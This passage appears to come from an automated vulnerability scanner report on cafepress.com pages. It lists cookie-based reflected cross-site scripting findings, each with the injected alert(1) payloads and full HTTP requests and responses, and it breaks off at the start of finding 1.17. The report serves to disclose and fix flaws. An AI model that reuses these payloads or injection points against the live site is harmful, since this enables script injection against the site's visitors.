HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 58721 Date: Sun, 26 Dec 2010 13:47:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58721 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'b770e</script><script>alert(1)</script>35f226fbd0 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+baby-bodysuits
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd70c"-alert(1)-"1bb61056447 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 59198 Date: Sun, 26 Dec 2010 13:47:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59198 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+baby-bodysuits
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d208f</script><script>alert(1)</script>60e92653a56 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d208f</script><script>alert(1)</script>60e92653a56 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59220 Date: Sun, 26 Dec 2010 13:47:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59220 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'd208f</script><script>alert(1)</script>60e92653a56 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+baby-hat
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50827"-alert(1)-"00860494a78 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 58548 Date: Sun, 26 Dec 2010 13:47:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58548 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+baby-hat
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93433</script><script>alert(1)</script>a643f06e2bf was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93433</script><script>alert(1)</script>a643f06e2bf ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 58578 Date: Sun, 26 Dec 2010 13:47:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58578 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '93433</script><script>alert(1)</script>a643f06e2bf ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_0...[SNIP]...
1.16. http://www.cafepress.com/+bags [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bags
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab65"-alert(1)-"48e2c7462b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59555 Date: Sun, 26 Dec 2010 13:47:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59555 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.17. http://www.cafepress.com/+bags [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bags
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91e0a</script><script>alert(1)</script>2ef0362a154 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
